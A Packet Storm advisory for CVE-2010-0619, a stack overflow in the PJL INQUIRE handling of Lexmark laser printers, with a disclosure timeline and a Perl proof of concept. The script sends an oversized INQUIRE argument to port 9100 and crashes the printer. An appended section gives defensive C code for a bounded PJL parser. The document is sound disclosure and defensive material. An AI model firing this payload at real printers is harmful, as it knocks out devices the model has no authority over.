packetstorm | Francis Provencher | PACKETSTORM:87559
History: Mar 23, 2010 - 12:00 a.m.

Lexmark Laser Printer Stack Overflow

2010-03-23 00:00:00
Francis Provencher
packetstormsecurity.com

EPSS

0.055

Percentile

93.3%

`#####################################################################################  
  
Application: Lexmark Multiple Laser Printer Remote Stack Overflow  
  
Platforms: Lexmark Multiple Laser printer  
  
Exploitation: Remote Exploitable  
  
CVE Number: CVE-2010-0619  
  
Discover Date: 2010-01-06  
  
Author: Francis Provencher (Protek Research Lab's)  
  
Website: http://www.protekresearchlab.com  
  
#####################################################################################  
  
1) Introduction  
2) Report Timeline  
3) Technical details  
4) Products affected  
5) The Code  
  
#####################################################################################  
  
=================  
1) Introduction  
=================  
  
Lexmark specializes in printers and printer accessories. Its current  
range of products includes color and monochrome laser printers and  
inkjet printers, both of which may include scanners (including  
all-in-one devices with faxing and copying capabilities and photo  
printers), and dot matrix printers. Lexmark was one of the first  
companies to release wifi inkjet printers and the very first to  
release printers with a web-enabled touchscreen, coming in early  
September of 2009. They also offer a wide variety of laser printers  
with software solutions for more professional printing environments.  
  
(Wikipedia)  
  
#####################################################################################  
  
====================  
2) Report Timeline  
====================  
  
2010-01-06 Vendor Contacted  
2010-01-09 Vendor Response  
2010-01-09 Vendor requests a PoC  
2010-01-10 PoC is sent to the vendor  
2010-01-12 Vendor confirms they received PoC  
2010-01-13 Vendor confirms the vulnerability  
2010-03-22 Public release of this advisory  
  
#####################################################################################  
  
======================  
3) Technical details  
======================  
  
Multiple Lexmark Laser Printers contain remote stack overflow  
vulnerabilities in their PJL processing functionality. These  
vulnerabilities could lead to remote code execution on the printer  
without authentication. The device freezes when a specially crafted PJL  
request with an invalid argument to the PJL INQUIRE command is sent to  
the daemon.  
  
#####################################################################################  
  
======================  
4) Products affected  
======================  
  
The list is too long; you can find information on the Lexmark web site:  
  
http://support.lexmark.com/alerts  
  
  
#####################################################################################  
  
=============  
5) The Code  
=============  
  
  
#!/usr/bin/perl -w  
# Found by Francis Provencher for Protek Research Lab's  
# {PRL} Lexmark Multiple Laser Printer Remote Stack Overflow PoC  
#  
# This PoC will completely DoS the printer and all its services. Use it  
# at your own risk.  
#  
  
use IO::Socket;  
if (@ARGV < 1){  
exit  
}  
$ip = $ARGV[0];  
#open the socket  
my $sock = new IO::Socket::INET (  
PeerAddr => $ip,  
PeerPort => '9100',  
Proto => 'tcp',  
);  
  
  
$sock or die "no socket :$!";  
send($sock, "\033%-12345X\@PJL INQUIRE  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n",0);  
  
  
  
close $sock;  
  
  
  
  
#####################################################################################  
(PRL-2010-01)  
`
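
Section 3 ties the overflow to the argument of PJL INQUIRE, so the following shows a bounded parser for that command line. It is an added example, not code from the advisory or from Lexmark firmware. The function name, status codes, 64-byte limit and allowed character set are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define PJL_UEL     "\033%-12345X"  /* Universal Exit Language prefix */
#define PJL_INQUIRE "@PJL INQUIRE"
#define PJL_ARG_MAX 64              /* assumed limit, not a vendor value */

enum pjl_status { PJL_OK = 0, PJL_NOT_INQUIRE = -1, PJL_ARG_TOO_LONG = -2,
                  PJL_ARG_BAD_CHAR = -3, PJL_ARG_EMPTY = -4 };

/* Hypothetical helper: validate one PJL line and copy the INQUIRE argument
 * into out (capacity outsz). Nothing is copied unless every check passed. */
int pjl_parse_inquire(const char *buf, size_t len, char *out, size_t outsz)
{
    const size_t uel = strlen(PJL_UEL), cmd = strlen(PJL_INQUIRE);
    size_t i, end, k;

    if (outsz == 0) return PJL_ARG_TOO_LONG;
    out[0] = '\0';
    if (len >= uel && memcmp(buf, PJL_UEL, uel) == 0) {  /* optional UEL */
        buf += uel; len -= uel;
    }
    if (len <= cmd || memcmp(buf, PJL_INQUIRE, cmd) != 0 ||
        (buf[cmd] != ' ' && buf[cmd] != '\t'))
        return PJL_NOT_INQUIRE;
    for (i = cmd; i < len && (buf[i] == ' ' || buf[i] == '\t'); i++)
        ;                                  /* skip separator whitespace */
    for (end = i; end < len && buf[end] != '\r' && buf[end] != '\n'; end++)
        ;                                  /* argument ends at CR or LF */
    if (end == i) return PJL_ARG_EMPTY;
    if (end - i > PJL_ARG_MAX || end - i >= outsz) return PJL_ARG_TOO_LONG;
    for (k = i; k < end; k++)              /* allow-list before any copy */
        if (!isalnum((unsigned char)buf[k]) && !strchr(" :_", buf[k]))
            return PJL_ARG_BAD_CHAR;
    memcpy(out, buf + i, end - i);         /* length already bounded */
    out[end - i] = '\0';
    return PJL_OK;
}

int main(void)
{
    char line[1100] = "@PJL INQUIRE ", out[PJL_ARG_MAX + 1];
    size_t n = strlen(line);
    memset(line + n, 'A', 1000);           /* constructed oversized argument */
    memcpy(line + n + 1000, "\r\n", 2);
    printf("oversized -> %d\n", pjl_parse_inquire(line, n + 1002, out, sizeof out));
    return 0;
}
```

The length is checked against both the protocol limit and the destination capacity before the copy, so an over-long argument is rejected and never truncated into the buffer.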
